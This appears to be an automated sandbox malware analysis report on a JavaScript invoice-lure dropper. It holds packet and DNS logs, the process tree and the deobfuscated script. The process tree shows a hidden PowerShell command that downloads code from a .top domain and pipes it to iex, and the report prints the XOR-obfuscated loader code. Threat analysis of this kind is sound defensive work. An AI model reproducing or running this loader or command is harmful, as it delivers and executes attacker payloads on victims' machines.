                                                                                                            Dec 17, 2024 11:31:39.091892958 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.211682081 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.211734056 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.211833954 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.283103943 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.283221960 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.283312082 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.287233114 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.287415981 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.287482977 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.295675039 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.295770884 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.295945883 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.304085016 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.304203033 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.304260015 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.312495947 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.312560081 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.312628031 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.320951939 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.321011066 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.321280003 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.329265118 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.329360962 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.329426050 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.337682009 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.337796926 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.337865114 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.346131086 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.346209049 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.346275091 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.354515076 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.354758024 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.354824066 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.362972975 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.363010883 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.363076925 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.403283119 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.403337955 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.403512001 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.475094080 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.475140095 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.475474119 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.477652073 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.477672100 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.477735043 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.482579947 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.482608080 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.482654095 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.487818003 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.487876892 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.488025904 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.492645025 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.492683887 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.492739916 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.497639894 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.497849941 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.497945070 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.502429962 CET8049709142.250.201.4192.168.2.8
                                                                                                            Dec 17, 2024 11:31:39.544816971 CET4970980192.168.2.8142.250.201.4
                                                                                                            Dec 17, 2024 11:31:39.822983027 CET4970880192.168.2.845.61.137.71
                                                                                                            Dec 17, 2024 11:31:39.823185921 CET4970980192.168.2.8142.250.201.4
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 17, 2024 11:31:35.368026972 CET4936053192.168.2.81.1.1.1
                                                                                                            Dec 17, 2024 11:31:35.506645918 CET53493601.1.1.1192.168.2.8
                                                                                                            Dec 17, 2024 11:31:37.418728113 CET5094753192.168.2.81.1.1.1
                                                                                                            Dec 17, 2024 11:31:37.556037903 CET53509471.1.1.1192.168.2.8
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 17, 2024 11:31:35.368026972 CET192.168.2.81.1.1.10x9852Standard query (0)mbuzy3yvzw3r.topA (IP address)IN (0x0001)false
                                                                                                            Dec 17, 2024 11:31:37.418728113 CET192.168.2.81.1.1.10x9c95Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 17, 2024 11:31:35.506645918 CET1.1.1.1192.168.2.80x9852No error (0)mbuzy3yvzw3r.top45.61.137.71A (IP address)IN (0x0001)false
                                                                                                            Dec 17, 2024 11:31:37.556037903 CET1.1.1.1192.168.2.80x9c95No error (0)www.google.com142.250.201.4A (IP address)IN (0x0001)false
                                                                                                            • mbuzy3yvzw3r.top
                                                                                                            • www.google.com
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.84970845.61.137.71807836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 17, 2024 11:31:35.824373007 CET176OUTGET /1.php?s=mints13 HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                            Host: mbuzy3yvzw3r.top
                                                                                                            Connection: Keep-Alive
                                                                                                            Dec 17, 2024 11:31:37.415682077 CET166INHTTP/1.1 302 Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Tue, 17 Dec 2024 10:31:37 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://www.google.com


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.849709142.250.201.4807836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 17, 2024 11:31:37.678965092 CET159OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                            Host: www.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Dec 17, 2024 11:31:39.091379881 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 17 Dec 2024 10:31:38 GMT
                                                                                                            Expires: -1
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ipoAENtlyLNkNLMw7Op4RQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                            Server: gws
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Set-Cookie: AEC=AZ6Zc-VGdgwZdePL7UrW-d4B5A2ItMl1cTpwZ6fgeqqfwavZD7QdRYBFSA; expires=Sun, 15-Jun-2025 10:31:38 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                            Set-Cookie: NID=520=FscREjUY9i_V3u9XCICi1u9MOIKR_taPm27K_S6wxmZrjTvXI5LxNga04V6heJRTXT85KP50adA7ZDLoGvsW4xWEIiZZl57ve9QtsGcm2jO71pqamPw-sFP3t5CAEb_6BN-_2CS7OwhC14wbT-5bb0pPOJgyHoAnMlK2zvi3jlXV9ut2ffRSE-xHFQITYw2UM2WCmxd2; expires=Wed, 18-Jun-2025 10:31:38 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                            Accept-Ranges: none
                                                                                                            Vary: Accept-Encoding
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Data Raw: 33 32 35 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76
                                                                                                            Data Ascii: 3252<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, v
                                                                                                            Dec 17, 2024 11:31:39.091440916 CET1236INData Raw: 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75
                                                                                                            Data Ascii: ideos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/log
                                                                                                            Dec 17, 2024 11:31:39.091478109 CET1236INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 43 6c 4e 68 5a 36 4f 6d 4d 50 32 7a 6b 76 51 50 7a 2d 48 62 53 51 27 2c 6b 45 58 50 49 3a 27 30 2c 37 39 33 31 30 38 2c 32 39 30 37 32 30 39 2c 36 32 33 2c 34 34 34 2c 34 34
                                                                                                            Data Ascii: function(){var _g={kEI:'ClNhZ6OmMP2zkvQPz-HbSQ',kEXPI:'0,793108,2907209,623,444,448529,90132,2872,2891,73050,6397,9708,344796,45786,5604,4175,99404,3801,2412,50869,7734,27534,11814,1635,13493,15783,27083,5213674,582,5992271,2842486,7,89,1,1,1,
                                                                                                            Dec 17, 2024 11:31:39.091511011 CET1236INData Raw: 2c 38 2c 32 32 39 2c 33 2c 31 35 2c 31 31 39 2c 33 33 33 2c 34 31 2c 31 31 39 2c 33 32 34 2c 32 31 33 2c 32 31 38 2c 34 32 34 2c 32 39 36 2c 32 38 30 2c 31 35 31 2c 32 34 33 2c 33 32 2c 32 2c 38 34 2c 36 38 36 2c 32 2c 31 32 34 2c 33 32 38 2c 34
                                                                                                            Data Ascii: ,8,229,3,15,119,333,41,119,324,213,218,424,296,280,151,243,32,2,84,686,2,124,328,47,169,1,6,578,2,7,263,171,81,33,109,256,347,60,156,7,17,479,63,14,4,83,275,375,118,340,143,28,4,1,576,13,188,665,938,22,1735,2946,20990078,359915,37198,18,2004,1
                                                                                                            Dec 17, 2024 11:31:39.091543913 CET1236INData Raw: 28 61 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 63 29 7d 3b 6c 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f
                                                                                                            Data Ascii: (a)+"&cad="+(b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=
                                                                                                            Dec 17, 2024 11:31:39.091593981 CET1236INData Raw: 29 3b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74
                                                                                                            Data Ascii: );document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call
                                                                                                            Dec 17, 2024 11:31:39.091628075 CET776INData Raw: 23 62 65 62 65 62 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68
                                                                                                            Data Ascii: #bebebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibilit
                                                                                                            Dec 17, 2024 11:31:39.091666937 CET1236INData Raw: 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 69 6e 6c 69 6e 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65
                                                                                                            Data Ascii: rder-top-color:#c0c0c0;display:-moz-inline-box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:no
                                                                                                            Dec 17, 2024 11:31:39.091811895 CET1236INData Raw: 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70
                                                                                                            Data Ascii: -width:0}.gbtb .gbts{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;wi
                                                                                                            Dec 17, 2024 11:31:39.091849089 CET1236INData Raw: 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20
                                                                                                            Data Ascii: line}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);backgrou
                                                                                                            Dec 17, 2024 11:31:39.211682081 CET1236INData Raw: 62 6d 30 6c 2c 2e 67 62 6d 30 6c 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f
                                                                                                            Data Ascii: bm0l,.gbm0l:visited{color:#000 !important;font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margi


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:05:31:05
                                                                                                            Start date:17/12/2024
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura72543461.js"
                                                                                                            Imagebase:0x7ff6ff8a0000
                                                                                                            File size:170'496 bytes
                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:05:31:31
                                                                                                            Start date:17/12/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:05:31:31
                                                                                                            Start date:17/12/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Call Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            callgraph clusterC0 clusterC2C0 clusterC4C0 clusterC6C4 clusterC8C4 clusterC10C4 clusterC12C0 clusterC14C0 clusterC16C0 clusterC18C16 clusterC20C16 clusterC22C0 clusterC24C0 clusterC26C0 clusterC28C26 clusterC30C26 clusterC32C0 clusterC34C0 clusterC36C0 clusterC38C0 E1C0 entry:C0 F3C2 Sleep E1C0->F3C2 F5C4 OSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA E1C0->F5C4 F13C12 CreateObject E1C0->F13C12 F15C14 apply E1C0->F15C14 F17C16 E1C0->F17C16 F25C24 Run E1C0->F25C24 F33C32 fromCharCode E1C0->F33C32 F35C34 parseInt E1C0->F35C34 F37C36 CreateObject E1C0->F37C36 F39C38 DeleteFile E1C0->F39C38 F7C6 split F5C4->F7C6 F9C8 push F5C4->F9C8 F11C10 fromCharCode F5C4->F11C10 F19C18 push F17C16->F19C18 F21C20 parseInt F17C16->F21C20 F23C22 e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr F27C26 F27C26->F23C22 F29C28 fromCharCode F27C26->F29C28 F31C30 parseInt F27C26->F31C30

                                                                                                            Script:

                                                                                                            Code
                                                                                                            0
                                                                                                            WScript.Sleep ( 25000 );
                                                                                                            • Windows Script Host.Sleep(25000) ➔ undefined
                                                                                                            1
                                                                                                            var QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1D = "72,84,84,80,26,15,15,77,66,85,90,89,19,89,86,90,87,19,82,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19";
                                                                                                              2
                                                                                                              function OSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA() {
                                                                                                              • OSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA() ➔ "http://mbuzy3yvzw3r.top/1.php?s=mints13"
                                                                                                              3
                                                                                                              var script1 = QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1D.split ( ',' );
                                                                                                              • "72,84,84,80,26,15,15,77,66,85,90,89,19,89,86,90,87,19,82,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19".split(",") ➔ 72,84,84,80,26,15,15,77,66,85,90,89,19,89,86,90,87,19,82,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19
                                                                                                              4
                                                                                                              var dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHjOSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA = [];
                                                                                                                5
                                                                                                                var QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1DdBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj = '';
                                                                                                                  6
                                                                                                                  for ( var dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ = 0 ; dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ < script1.length ; dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ ++ )
                                                                                                                    7
                                                                                                                    {
                                                                                                                      8
                                                                                                                      dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHjOSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA.push ( String.fromCharCode ( script1[dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ] ^ 5 * 6 + 0.25 * 8 ) );
                                                                                                                        9
                                                                                                                        }
                                                                                                                          10
                                                                                                                          for ( var dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ = 0 ; dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ < dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHjOSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA.length ; dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ ++ )
                                                                                                                            11
                                                                                                                            {
                                                                                                                              12
                                                                                                                              QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1DdBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj += dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHjOSbmnwBUMyABGVq5kiJel6TAidu0naN0lFiRPaNM56iSBOgrubjeWvTWOSfUckGWZK6s35WAHIPB17pDU0WR1MxN2qQhA[dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHje9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ];
                                                                                                                                13
                                                                                                                                }
                                                                                                                                  14
                                                                                                                                  return QNBvQX0jhaIvITPZCcn2rjLW7Spmqrdv7OTzMio1DdBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj;
                                                                                                                                    15
                                                                                                                                    }
                                                                                                                                      16
                                                                                                                                      var e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ = [ "10b2", "10b6", "1086", "1097", "108c", "1095", "1091", "10cb", "10b6", "108d", "1080", "1089", "1089" ];
                                                                                                                                        17
                                                                                                                                        var fjZ7Iiu9v01XhVSxrM8os9TsWrSi6YcTVW1dlD = WScript.CreateObject ( String.fromCharCode.apply ( null,
                                                                                                                                        • function fromCharCode().apply(null,87,83,99,114,105,112,116,46,83,104,101,108,108) ➔ "WScript.Shell"
                                                                                                                                        • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                        18
                                                                                                                                        function () {
                                                                                                                                        • () ➔ 87,83,99,114,105,112,116,46,83,104,101,108,108
                                                                                                                                        • () ➔ 87,83,99,114,105,112,116,46,83,104,101,108,108
                                                                                                                                        19
                                                                                                                                        var uv9CB6t1xh7AR = 0;
                                                                                                                                          20
                                                                                                                                          var dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj = [];
                                                                                                                                            21
                                                                                                                                            while (uv9CB6t1xh7AR < e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ.length )
                                                                                                                                              22
                                                                                                                                              {
                                                                                                                                                23
                                                                                                                                                dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj.push ( parseInt ( e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJ[uv9CB6t1xh7AR], 2 * 4 * 2 ) ^ ( 500 * 8 + 50 * 6 + 5 * 5 ) );
                                                                                                                                                • parseInt("10b2",16) ➔ 4274
                                                                                                                                                • parseInt("10b6",16) ➔ 4278
                                                                                                                                                • parseInt("1086",16) ➔ 4230
                                                                                                                                                • parseInt("1097",16) ➔ 4247
                                                                                                                                                • parseInt("108c",16) ➔ 4236
                                                                                                                                                • parseInt("1095",16) ➔ 4245
                                                                                                                                                • parseInt("1091",16) ➔ 4241
                                                                                                                                                • parseInt("10cb",16) ➔ 4299
                                                                                                                                                • parseInt("10b6",16) ➔ 4278
                                                                                                                                                • parseInt("108d",16) ➔ 4237
                                                                                                                                                24
                                                                                                                                                uv9CB6t1xh7AR ++;
                                                                                                                                                  25
                                                                                                                                                  }
                                                                                                                                                    26
                                                                                                                                                    return dBRCpmIVP8tiPqnS5Oy3Fb8CdDllLhzpFlvyJHrSv4iHj;
                                                                                                                                                      27
                                                                                                                                                      } ( ) ) ) ;
                                                                                                                                                        28
                                                                                                                                                        function e9HvIXYeUZCgDHK3HsKbnZjf4AaHgaZ2em61hK4KRpJgkldfjnr() {
